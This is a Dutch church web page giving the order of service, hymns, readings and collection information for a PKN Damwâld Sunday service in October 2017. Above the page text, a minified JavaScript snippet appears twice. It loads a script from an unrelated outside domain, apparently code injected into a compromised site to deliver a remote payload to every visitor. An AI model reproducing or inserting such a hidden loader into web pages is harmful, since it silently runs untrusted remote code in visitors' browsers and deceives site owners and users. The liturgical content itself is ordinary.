;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 22 oktober 2017 9:30 uur - PKN Damwâld
zondag 22 oktober 2017
09:30 uur

Kerkdienst zondag 22 oktober 2017 9:30 uur

Informatie

Voorganger:Ds. W.L. de Jong, Rinsumageast
Organist:Jaap van der Horn
Liturgie
lied voor de dienst Elb 170
Welkom en mededelingen
Aanvangslied: psalm 124: 1, 3 en 4.
Stil gebed , Votum en Groet
Gebed van toenadering
Genadeverkondiging en loflied Gezang 16
Leefregel
We zingen: Psalm 67: 1, 2 en 3
Gebed voor de opening v.h. Woord
We lezen: 2 Kon. 4: 38-44
We zingen: gezang 280: 1 en 2.
We lezen: Marcus 8: 14-20
We zingen: gez. 351: 1, 2 en 3.
Overdenking
We zingen: Gezang 465: 1, 2 en 3
Gebeden
Collecte
Slotlied gezang 446: vers 1, 2, 4, 5 en 6.
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Najaarscampagne: Versterk de kerk in het Midden-Oosten

Najaarscampagne: "Versterk de kerk in het Midden-Oosten"
In de najaarscampagne staan we stil bij de blijvende urgente situatie van de kerk in het Midden-Oosten. In Syrië en Irak vluchten Christenen al jaren voor oorlog en geweld. In Egypte zorgen aanslagen voor angst. Toch houdt de Koptisch Orthodoxe kerk zich vast aan Jezus woorden: "Maar ik zeg u, houd van uw vijanden, zegen die u vervloeken, doe goed aan degenen die u haten en bid voor degenen die u misbruiken". Kerken in Syrië en in Egypte blijven geloven in delen, ondanks de pijn en het verdriet. Zij blijven zich inzetten door noodhulpverlening te bieden waar nodig. De Christenen in het Midden-Oosten hebben onze steun hard nodig. Om vol te houden, om symbool van hoop te zijn. Daarom vraagt Kerk in Actie uw aandacht voor hun situatie. Ons gebed is hard nodig, maar tegelijkertijd willen we hen ook steunen door geld in te zamelen. Een voedselpakket met o.a. bloem, rijst, olie, bonen, vlees en vis in blik kost € 35,00.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds